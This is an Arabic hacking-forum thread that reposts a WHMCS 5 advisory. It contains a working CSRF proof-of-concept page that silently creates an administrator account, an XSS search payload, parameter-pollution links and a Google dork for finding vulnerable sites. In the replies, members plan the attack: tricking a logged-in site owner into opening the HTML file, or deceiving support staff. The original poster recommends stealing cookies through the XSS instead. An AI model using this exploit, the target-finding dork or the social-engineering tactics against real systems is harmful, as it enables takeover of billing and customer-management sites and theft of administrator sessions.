1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Abo MalaK
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    السلام عليكيم
    ########
    # Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
    # Version: Latest version 5.1 and other previous version maybe vulnerable
    # Vendor: WHMCS - The Complete Client Management, Billing Support Solution
    # Date: 2012-05-30
    # Tested on: win/linux
    # Author/Found by: Shadman Tanjim
    # Email: shadman2600gmail.com
    # Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
    # Special Thanks: x8631p
    # Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS
    ##########

    CSRF Vulnerability:

    Get:
    http://site.com/clientarea.php
    http://site.com/admin/index.php
    http://site.com/admin/login.php

    Post:
    http://site.com/admin/login.php
    http://site.com/cart.php
    http://site.com/admin/configadmins.php
    http://site.com/pwreset.php


    p0c:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <h2>WHMCS CSRF ExpL0iT PoC</h2>
    </head>
    <script language="javascript" type="text/javascript" >

    function lifeissimple() {

    var token = "Token Value";

    var img = document.createElement("img");
    var site="http://www.localhost.com:80";
    var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token +
    "&roleid=1&firstname=dead&lastname=cow&email=deadc ow@deadcow.com&username=deadcow&password=
    deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend
    &language=English";
    img.setAttribute("src", requesturl);
    document.body.appendChild(img);

    var img2 = document.createElement("img");
    img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&");
    document.body.appendChild(img);
    }

    </script>
    <body onload="lifeissimple();">

    </body>
    </html>


    Cross-site Scripting (XSS) Vulnerability:

    request:pOST http://site.com/knowledgebase.php?action=search HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    search='%20onerror%3D'f(PSRyh)


    HTTP Parameter Pollution :

    1.Affected link: http://site.com/cart.php?a=add&domai...913620=v992636
    Affected parameter: a=add

    2. Affected link: http://site.com/domainchecker.php?se...946774=v992350
    Affected parameter: search=bulkregister

    3. Affected link: http://site.com/cart.php?currency=2&...972751=v976696
    Affected parameter: currency=2

    المصدر :

    http://cxsecurity.com/issue/WLB-2012050220

    الثغرة تسمح لك بإضافة أدمن ..i:q2^:

    أو سحب الكوكيز تبعو ..)2:"

    لسا ماجربتها .. هلئ شفتها وحبيت شاركن فيها
    قريبا نشالله بجربها و بشرحها ..&:"
     
    جاري تحميل الصفحة...
  2. D-Zoro
    rank
    Developer

    عضو منذ:
    ‏14 يونيو 2012
    عدد المشاركات:
    10
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    مـصـ|القاهرة|ـــر
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    هذه الثغرة لازمها هندسة اجتماعيةi:q4^:

    يعني ترسل لصاحب الموقع ملف html الخاص بالثغرة مرفوع او

    ما شبه و عليه هو بدوره ان يكون مسجل الدخول:!."

    بعد ان يفتح الملف سيعمل تلقائيا و يضيف ادمن
    #:"​
     
  3. amin
    rank
    Developer

    عضو منذ:
    ‏2 مايو 2012
    عدد المشاركات:
    14
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    <,,,<,,,<
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    يوجد توكين حبيبي في سكربت whmcs ​
     
  4. Anti-Trust
    rank
    Developer

    عضو منذ:
    ‏12 مايو 2012
    عدد المشاركات:
    14
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    w00t
    الإقامة:
    jordan
    نظام التشغيل:
    Linux
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    شوي اسلوب هندسة اجتماعية


    وافكار راح تمشيها وراح ينضاف الادمن تلاقي
     
  5. Abo MalaK
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability



    طبعا الثغرة تحتاج لهندسة إجتماعية

    بس مابتوقع أنها مشكلة بهيك نوع

    من السكريبات (لدعم الفني ) تقدر تراسل الشركة وتئولهم

    إنو بدك تنئل هالموقع لعندهم .. والأفكار كتيرة &:"

    بالنسبة لنوعها .. فالأنسب أنك تسحب الكوكيز فيها ..


    بدل ماتستعملها csrf لأنو ممكن الستاف

    مايكون عنده صلاحية يضيف أدمن ..

    نورتو الموضوع ياشباب
     
  6. vŀяύš
    rank
    V • I • P

    عضو منذ:
    ‏11 يونيو 2012
    عدد المشاركات:
    33
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    Thank You Man
     
  7. mr.mourad <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏8 يوليو 2013
    عدد المشاركات:
    165
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    يعطيك الف الف العافية اخي شكراً جزيلاً على الطرح :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...